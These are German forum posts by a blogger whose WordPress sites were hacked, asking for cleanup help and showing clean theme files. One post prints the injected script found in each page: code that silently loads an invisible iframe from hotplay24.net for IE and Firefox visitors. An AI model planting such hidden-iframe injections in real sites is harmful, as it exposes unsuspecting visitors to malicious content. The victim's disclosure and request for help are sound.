Beiträge von Diamant

    Schau mal auf virus.befla.de. Dort wird dir angezeigt welche Dateien betroffen sind

    Kann man diesen Test nur 1x durchführen? habe die Blogs nicht alle da vorher getestet und alle die ich heute teste sind nun sauber. Hatten vorher aber auch diesen Code drin. frau-schau.de und reiseland-norwegen.info werden jedoch immer noch als not up to date und infiziert angezeigt, obwohl ich die upgedatet habe und den Code raus habe.

    domino - danke auch Dir für Deine Tipps und Antwort.
    Habe das Forum heute Nachmittag ausführlich durchstöbert und einige interessante Infos zum Thema Sicherheit gefunden. Allerdings sind einige Sachen erst einmal "Böhmische Dörfer" für mich, aber Stück für Stück wird es.

    Ja, der erste Schreck ist verflogen - PW sind geändert, auch die vom FTP - admin hatte ich mich zum Glück nie genannt und in allen Blogs einen anderen Usernamen genutzt. Das mit dem wp als Tabellenpräfix versteh ich nur nicht, wo schaut man das nach??

    Danke für die Seite. Bei der Überprüfung find ich ja blankes Grauen vor. Hab gestern den Blog, den ich durch mißlungene Löschversuche zerschossen habe einfach auf die neueste Version upgegradet und danach war das komische Script verschwunden. Laut der von dir empfohlenen Seite ist die nun auch clean, doch kann man dem trauen, das es nicht wiederkommt und nicht nur grad vor sich hinschlummert??

    Hier mal die index.php von dem oben genannten Blog, konnt da nichts falsches erkennen, aber ich kenn mich da auch nicht aus.

    <?php
    get_header();

    if (have_posts())
    {
    while (have_posts())
    {
    art_post();
    }
    art_page_navi();
    } else {
    art_not_found_msg();
    }

    get_footer();

    und die footer.php

    <?php
    $content = ob_get_clean();
    echo art_parse_template(art_page_template(), art_page_variables(array('content'=> $content)));
    ?>
    <div id="wp-footer">
    <?php wp_footer(); ?>
    <!-- <?php printf(__('%d queries. %s seconds.', THEME_NS), get_num_queries(), timer_stop(0, 3)); ?> -->
    </div>
    </body>
    </html>


    Danke Dir

    Habe gerade das Forum durchstöbert, da meine Blogs gehackt wurden. Leider habe ich noch keine Lösung gefunden. Ich hoffe hier kann mir jemand weiterhelfen, hab jedoch null Ahnung von solchen Dingen. Hab ein C-Panel Zugang und einen FTP-Zugang, phpmyadmin hab ich auch gefunden, weiß aber nicht was ich da suchen und tun muß.
    Mein Hoster behauptet es ist alles Ok, doch im Quelltext jedes Bloges finde ich am Ende ein Script, welcher im Firefox (ältere Version) und IE nach ca. 8 sec. meinen Blog umleitet. Ich kann mir nicht vorstellen, das ein Hacker jeden Blog einzeln angreift und meine 2 anders gehosteten Seiten dafür verschont. Das Script finde ich leider in keiner index oder php. Tipp vom Hoster, sollte in der index.php oder footer sicher zu finden sein, da ist jedoch gar nichts von diesem teil zu finden. Einen Blog hab ich schon aus versehen lahmgelegt, da ich beim Antivirus Plugin alles was es angab gelöscht habe. Da der aber noch ganz frisch war ist das kein Problem.

    Folgendes finde ich am Ende jedes Quelltextes:

    <script>var url = "http://hotplay24.net%22;if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script><script>var url = "http://hotplay24.net%22;if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script>


    Wer kann mir helfen und sagen wo ich noch suchen kann oder was ich tun muß. Ich bin schon echt am verzweifeln. Gibt es evtl. ein Tool, was alles überprüfen und löschen kann?
    Bin in solchen Dingen absoluten Newbie - bitte für Anfänger beschreiben.

    Achja, eine Blogurl ist xxx.frau-schau. de (weiß nicht ob das Script gefährlich ist oder nicht)

    Ich sage schon mal ganz doll Danke im Voraus
    Manja